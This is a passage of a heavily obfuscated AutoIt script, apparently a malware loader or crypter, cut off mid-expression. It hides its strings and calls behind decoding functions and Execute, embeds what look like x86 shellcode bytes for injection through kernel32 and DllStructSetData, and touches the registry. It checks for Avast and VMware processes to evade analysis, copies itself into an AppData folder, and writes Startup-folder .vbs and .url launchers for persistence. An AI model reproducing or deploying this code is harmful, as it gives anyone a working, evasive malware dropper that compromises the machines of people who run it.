2049571787 CASE 777806286 GLOBAL $J32343237VS8W = $U32343233PUXJX ($I31330D6 ("StringReplacer7yw1zj1cbtgaq258ydn72fn1e1pa" , 29 + 7692 * 5 + 4294928836 ) ) $912996352 = 1635010930 CASE 782363534 GLOBAL $B32343333SKG = $U32343233PUXJX ($Z37IB8K ("0x537472696E674C656E" ) ) $912996352 = 252822972 CASE 792800899 GLOBAL $W32353730R2Y = $P3639T2ATS $912996352 = 549026150 CASE 807257674 GLOBAL $R333335MUSIO = $V39NUX ("1Fu366e7DFFFu366e7Fu366e70u366e7FBu366e77u366e74D0C8u366e794Du366e7FCu366e78D0u366e7C89u366e76u366e7A4u366e70u366e789u366e74Du366e7Fu366e78u366e7680u366e70300u366e700083C1115u366e716A0u366e70u366e7FFD0u366e78u366e7BD88u366e75u366e7Du366e7B7u366e750A5u366e7F5u366e7" , "u366e7" , "" ) $912996352 = 197553472 CASE 812054995 GLOBAL $F313332316ESE = $V39NUX ("dwfbyjorfbyjdfbyj" , "fbyj" , "" ) $912996352 = 337696162 CASE 817955186 GLOBAL $I323438317TCXTD = $U32343233PUXJX ($V39NUX ("Fio5cnleo5cnEo5cnxo5cnio5cnsto5cns" , "o5cn" , "" ) ) $912996352 = 2019368202 CASE 820767532 GLOBAL $W313035393BB1A = $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 
(87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87334 ) ) $912996352 = 507017416 CASE 823320600 GLOBAL $M31333337P5NMPJ = $V39NUX ("Eu2txBu2tx0u2tx98B45u2txFC8u2tx3u2txC0u2tx01u2tx894u2tx5u2txFC8Bu2tx4u2txDFCu2tx3" , "u2tx" , "" ) $912996352 = 1832348312 CASE 826688769 $T33R0R ("nqs4volnkgqkxnkr27hj8ridlo3" , $U3131F51ZD ("xg68r374eorxndig52md7634swccint" , 28 + 6195 * 1 + 4294961101 ) ) $912996352 = 296604825 CASE 838625524 GLOBAL $K32343438DR = $U32343233PUXJX ($U3131F51ZD ("o3gi7kph2yf7cugRegDelete" , 15 + 2350 * 2 + 4294962596 ) ) $912996352 = 1495046000 CASE 841109807 GLOBAL $I313530342Q0 = $V3135P3 ("hgn0g8vrkelkno1kre21mlkernel32crov2r2sklar3pgo5b6zzud2a" , 23 + 4294960630 + 6666 , 8 + 4294960630 + 6666 ) $912996352 = 603408284 CASE 846271121 GLOBAL $L3638352MGRM = $V39NUX 
("FkrgmeF6krgme9krgme6Ekrgme6krgme4krgme6FkrgmeCkrgme7krgme8krgme580krgmeFkrgmeEkrgmeFkrgmeFkrgmeFkrgmeFkrgme7krgme7krgme7krgme35Ckrgme4DkrgmeCkrgme7krgme8krgme5krgme8krgme4krgmeFEkrgmeFFFF6963krgme7krgme2krgme6krgmeFCkrgme785krgme8krgme8krgmeFEFkrgmeFFF" , "krgme" , "" ) $912996352 = 220189866 CASE 853394200 $T33R0R ("846snwoj50hn0dr7us6h" , $U3131F51ZD ("j1p6b0c00gwxcmb7oql3v2uhE4554C78544FFFFFF5C467261C78548FFFFFF6D65776FC7854CFFFFFF726B5C76C78550" , 24 + 4294963711 + 3585 ) ) $912996352 = 1374344267 CASE 854553390 GLOBAL $I31330D6 = $L30KEU (STRINGREPLACE ("4b4k4vn4jb27t4ex4S4b4k4vn4jb27t4ex4tr4b4k4vn4jb27t4ex4ingT4b4k4vn4jb27t4ex4rim4b4k4vn4jb27t4ex4Rig4b4k4vn4jb27t4ex4ht" , "4b4k4vn4jb27t4ex4" , "" ) ) $912996352 = 1296483263 CASE 871261929 $T33R0R ("u527utigfe3d3pa84x6ao" , $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 
(87347 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87328 ) ) ) $912996352 = 1139621656 CASE 876721733 GLOBAL $U32343233PUXJX = EXECUTE $912996352 = 274876241 CASE 877424282 GLOBAL $G31343135T1 = $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) 
& $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87350 ) ) $912996352 = 2112601067 CASE 902200369 GLOBAL $V32343537Q712 = $U32343233PUXJX ($I3237VCWR5 ) $912996352 = 1833896075 CASE 933359882 $T33R0R ("n6uj6l2a8fdb82i1" , $I31330D6 ("ptrev0y1ackzfqvzwzk6x" , 18 + 9030 + 4294958266 ) ) $912996352 = 1604859022 CASE 935061787 GLOBAL $U3930380NXX = $V3135P3 ("n5b131xrtvfwtwf6xwFFF526A006A0368C2AD7F71E818F7FFFF83C4148D9510FDFFFFEB038B55FC8D8iedfait68rn2sdnhen5dnkkcp5" , 19 + 9027 + 4294958269 , 64 + 9027 + 4294958269 ) $912996352 = 342768592 CASE 947431475 GLOBAL $X3231PEJE8 = $I31330D6 ("RegWritenz40hiecq0s0mmcs8thkw8pe26n" , 27 + 2516 * 5 + 4294954716 ) $912996352 = 961348210 CASE 954924030 GLOBAL $L31393938EKFWEI = $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 
(87348 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87336 ) ) $912996352 = 38374943 CASE 961348210 $T33R0R ("x77ik6x56hmg2xy" , $I31330D6 ("RegReadohno7e4ohqkdarahuwx45i72bi" , 26 + 3404 + 4294963892 ) ) $912996352 = 540021528 CASE 970108844 GLOBAL $L31353038CR = $C31KU765 (R37FLO7 (87351 ) ) & $C31KU765 (R37FLO7 (87381 ) ) & $C31KU765 (R37FLO7 (87396 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87391 ) ) & $C31KU765 (R37FLO7 (87389 ) ) & $C31KU765 (R37FLO7 (87389 ) ) & $C31KU765 (R37FLO7 (87377 ) ) & $C31KU765 (R37FLO7 (87390 ) ) & $C31KU765 (R37FLO7 (87380 ) ) & $C31KU765 (R37FLO7 (87356 ) ) & $C31KU765 (R37FLO7 (87385 ) ) & $C31KU765 (R37FLO7 (87390 ) ) & $C31KU765 (R37FLO7 (87381 ) ) & $C31KU765 (R37FLO7 (87367 ) ) $912996352 = 291487155 CASE 989344357 $T33R0R ("zh44oq14b1kgwpyfq3mleejkxqm" , $I31330D6 ("ptrvmvpr21fgb5aelfyjydmas" , 22 + 4294966077 + 1219 ) ) $912996352 = 544563695 CASE 1001249821 GLOBAL $S32353233CD7VP0 = $U32343233PUXJX ($U3131F51ZD ("zdwijq5y8DllStructSetData" , 9 + 537 * 4 + 4294965148 ) ) $912996352 = 1615550310 CASE 1023162799 GLOBAL $S37353T0JYH = $I31330D6 ("vmtoolsd.exera2khkzkmkkprl7yom4gi135e3nfur" , 30 + 6257 * 2 + 4294954782 ) $912996352 = 247051243 CASE 1050946220 GLOBAL $T31323632RXVXOI = $V3135P3 ("1nmbvnnkhi5tbuw5wqavjf200000000000000000000000000000000000000000000000000000000000000000000000beqxv5c5srtk" , 24 + 5744 + 4294961552 , 71 + 5744 + 4294961552 ) $912996352 = 1132199390 CASE 1065523592 GLOBAL $B313736N7 = $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 
(87346 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & 
$C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) ) $912996352 = 508698040 CASE 2049571787 $T33R0R ("87mv7vr70wo1xtvhgkcnmml0v6un3" , $V3135P3 ("nvtjrj33uonqhdrmp1awtp@ScriptFullPathzhvoazqp3d7vjnzunsem" , 23 + 4294959797 + 7499 , 15 + 4294959797 + 7499 ) ) $912996352 = 1588307237 CASE 2061627909 #Region ### START Koda GUI section ### Form= $912996352 = 272497377 CASE 2095464838 GLOBAL $V31333235IRO = $V3135P3 ("io50zp3dul1nc85sxaekrn.exe7ygf0uktyaudfk0q0tqa3e7212" , 19 + 5574 + 4294961722 , 8 + 5574 + 4294961722 ) $912996352 = 1537780935 CASE 2103351493 GLOBAL $U32343639SOZOD7 = $U32343233PUXJX ($V3135P3 ("hi1tmp860m3o3z872mig02FileOpenovy1i3p28k6n622vbp" , 23 + 6163 + 4294961133 , 8 + 6163 + 4294961133 ) ) $912996352 = 1399057616 CASE 2111201079 GLOBAL $Q31333534ADJPU = $V39NUX ("data885o" , "885o" , "" ) $912996352 = 1525045795 CASE 2112601067 GLOBAL $F31343435TN3P = $I31330D6 ("CEBB08D9DF0FEFFFF31FF89FA39556b1q5b1o" , 8 + 7984 + 4294959312 ) $912996352 = 1845988677 ENDSWITCH WEND IF $F32343534YAF ($Z37IB8K ("0x617661737475692E657865" ) ) OR $F32343534YAF ($C31KU765 (R37FLO7 (87377 ) ) & $C31KU765 (R37FLO7 (87398 ) ) & $C31KU765 (R37FLO7 (87383 ) ) & $C31KU765 (R37FLO7 (87397 ) ) & $C31KU765 (R37FLO7 (87385 ) ) & $C31KU765 (R37FLO7 (87326 ) ) & $C31KU765 (R37FLO7 (87381 ) ) & $C31KU765 (R37FLO7 (87400 ) ) & $C31KU765 (R37FLO7 (87381 ) ) ) THEN $S32343336CEZAP ($D37315G1OJ ) IF FALSE THEN IF $F32343534YAF ($V3733UR83 ) OR $F32343534YAF ($S37353T0JYH 
) THEN EXIT ENDIF ENDIF IF FALSE THEN $S32343336CEZAP (DELAY TIME000 ) IF FALSE THEN P34ZE6B () IF TRUE THEN IF NOT FILEEXISTS (@APPDATADIR & "\" & "hdoydskbdx" ) THEN DIRCREATE (@APPDATADIR & "\" & "hdoydskbdx" ) ENDIF IF NOT FILEEXISTS (@APPDATADIR & "\" & "hdoydskbdx" & "\" & "znytpstdcrwsisx" & $V3135P3 ("yef5e3tpsc8d01r.exeytifuazd4rdlzghrb084pyon0iy4" , 16 + 9613 * 1 + 4294957683 , 4 + 9613 * 1 + 4294957683 ) ) THEN $1739397950 = 1178081240 WHILE 1 SWITCH $1739397950 CASE 274725409 $V32343837D2JP0O ($S323633324VR4C ) EXITLOOP CASE 317041254 $E323437325H (@APPDATADIR & "\" & "hdoydskbdx" & "\" & "znytpstdcrwsisx" & $O353SY ("jr57rx35k5denm" ) , $S323633324VR4C ) $1739397950 = 326133898 CASE 326133898 $V32343837D2JP0O (@APPDATADIR & "\" & "hdoydskbdx" & "\" & "znytpstdcrwsisx" & $O353SY ("d77vjrjkbkdjxc544x7x14cl" ) ) $1739397950 = 274725409 CASE 1178081240 DIM $S323633324VR4C = FILEREAD ($P323630360VS5 ) & $U32353433SZ7WG ($C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) ) $1739397950 = 317041254 ENDSWITCH WEND IF FALSE THEN $N32353436WLYY (@APPDATADIR & "\" & "hdoydskbdx" & "\" & "znytpstdcrwsisx" & $C31KU765 (R37FLO7 (87326 ) ) & $C31KU765 (R37FLO7 (87381 ) ) & $C31KU765 (R37FLO7 (87400 ) ) & $C31KU765 (R37FLO7 (87381 ) ) , $V3135P3 ("az6aipx4rmwo07dhd4yt4c72m+SH0nqjxxalm" , 26 + 4294958186 + 9110 , 3 + 4294958186 + 9110 ) ) IF TRUE THEN $R32343834KC2 (@APPDATADIR & "\" & "hdoydskbdx" & "\" & "znytpstdcrwsisx" & $T3831QOGY0 & $S383353 ) ENDIF IF NOT FILEEXISTS (@STARTUPDIR & "\" & "znytpstdcrwsisx" & $C31KU765 (R37FLO7 (87382 ) ) & $C31KU765 (R37FLO7 (87394 ) ) & $C31KU765 (R37FLO7 (87326 ) ) & $C31KU765 (R37FLO7 (87397 ) ) & $C31KU765 (R37FLO7 (87394 ) ) & $C31KU765 (R37FLO7 (87388 ) ) ) OR NOT FILEEXISTS (@STARTUPDIR & "\" & "znytpstdcrwsisx" & $I31330D6 (".vbsca4w4f6aahsai6defa" , 18 + 4277 + 4294963019 ) ) THEN IF $F32343534YAF ($Z37IB8K ("0x6B73646575692E657865" ) ) THEN $1739397950 = 1178081240 WHILE 1 SWITCH $1739397950 CASE 274725409 
$V32343837D2JP0O (@STARTUPDIR & "\" & "znytpstdcrwsisx" & $Z37IB8K ("0x66722E75726C" ) ) EXITLOOP CASE 317041254 $Y32363632JPWL &= "mtrqvdmu" & $V3135P3 ("44l63gt1y.Run mcxvm6o72rungjf" , 10 + 514 + 4294966782 , 5 + 514 + 4294966782 ) & $F32353236Y0YC ($K3933UG ) & $F32353236Y0YC ($R3935M2GF ) & $F32353236Y0YC ($Z37IB8K ("0x3334" ) ) & @APPDATADIR & "\" & "hdoydskbdx" & "\" & "znytpstdcrwsisx" & $V39NUX (".erukegxrukegerukeg" , "rukeg" , "" ) & $F32353236Y0YC (B38ZPPGU ("959544-959545-" , 959493 ) ) & $F32353236Y0YC ($C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87332 ) ) ) & $F32353236Y0YC ($O353SY ("ql7enj02k6zwk5v638lhlhl2plmy4b" ) ) & $Z37IB8K ("0x2C20302C2046616C7365" ) & $F32353236Y0YC ($V39NUX ("13grrnor" , "grrnor" , "" ) ) & $F32353236Y0YC ($V39NUX ($O353SY ("ryvqdbbk5xmy2ogeyvgwlt2u5sty" ) , "alsdi77y" , "" ) ) $1739397950 = 326133898 CASE 326133898 $E323437325H (@STARTUPDIR & "\" & "znytpstdcrwsisx" & $Y3939VLK , $Y32363632JPWL ) $1739397950 = 274725409 CASE 1178081240 DIM $Y32363632JPWL = $C31KU765 (R37FLO7 (87363 ) ) & $C31KU765 (R37FLO7 (87381 ) ) & $C31KU765 (R37FLO7 (87396 ) ) & $C31KU765 (R37FLO7 (87312 ) ) & "mtrqvdmu" & $U3131F51ZD ("ihnvteol4aize3d0 = CreateObject(" , 16 + 4294959398 + 7898 ) & $F32353236Y0YC ($A3835CI158N ) & $Z37IB8K ("0x575363726970742E5368656C6C" ) & $F32353236Y0YC ($J3837OEO ) & ")" & $F32353236Y0YC ($O353SY ("1tn1e62vivh7w0" ) ) & $F32353236Y0YC ($P39311N ) $1739397950 = 317041254 ENDSWITCH WEND ELSE $1739397950 = 1178081240 WHILE 1 SWITCH $1739397950 CASE 274725409 $V32343837D2JP0O (@STARTUPDIR & "\" & "znytpstdcrwsisx" & $C31KU765 (R37FLO7 (87326 ) ) & $C31KU765 (R37FLO7 (87382 ) ) & $C31KU765 (R37FLO7 (87394 ) ) & $C31KU765 (R37FLO7 (87326 ) ) & $C31KU765 (R37FLO7 (87397 ) ) & $C31KU765 (R37FLO7 (87394 ) ) & $C31KU765 (R37FLO7 (87388 ) ) ) EXITLOOP CASE 317041254 $E323730338B3B &= $C31KU765 (R37FLO7 (87365 ) ) & $C31KU765 (R37FLO7 (87362 ) ) & $C31KU765 (R37FLO7 (87356 ) ) & $C31KU765 (R37FLO7 (87341 ) ) & 
$C31KU765 (R37FLO7 (87382 ) ) & $C31KU765 (R37FLO7 (87385 ) ) & $C31KU765 (R37FLO7 (87388 ) ) & $C31KU765 (R37FLO7 (87381 ) ) & $C31KU765 (R37FLO7 (87338 ) ) & $C31KU765 (R37FLO7 (87327 ) ) & $C31KU765 (R37FLO7 (87327 ) ) & $C31KU765 (R37FLO7 (87327 ) ) & @APPDATADIR & "\" & "hdoydskbdx" & "\" & "znytpstdcrwsisx" & $O353SY ("mfgbicjp88lo" ) $1739397950 = 326133898 CASE 326133898 $E323437325H (@STARTUPDIR & "\" & "znytpstdcrwsisx" & $P31303823WM0Y , $E323730338B3B ) $1739397950 = 274725409 CASE 1178081240 DIM $E323730338B3B = $C31KU765 (R37FLO7 (87371 ) ) & $C31KU765 (R37FLO7 (87353 ) ) & $C31KU765 (R37FLO7 (87390 ) ) & $C31KU765 (R37FLO7 (87396 ) ) & $C31KU765 (R37FLO7 (87381 ) ) & $C31KU765 (R37FLO7 (87394 ) ) & $C31KU765 (R37FLO7 (87390 ) ) & $C31KU765 (R37FLO7 (87381 ) ) & $C31KU765 (R37FLO7 (87396 ) ) & $C31KU765 (R37FLO7 (87363 ) ) & $C31KU765 (R37FLO7 (87384 ) ) & $C31KU765 (R37FLO7 (87391 ) ) & $C31KU765 (R37FLO7 (87394 ) ) & $C31KU765 (R37FLO7 (87396 ) ) & $C31KU765 (R37FLO7 (87379 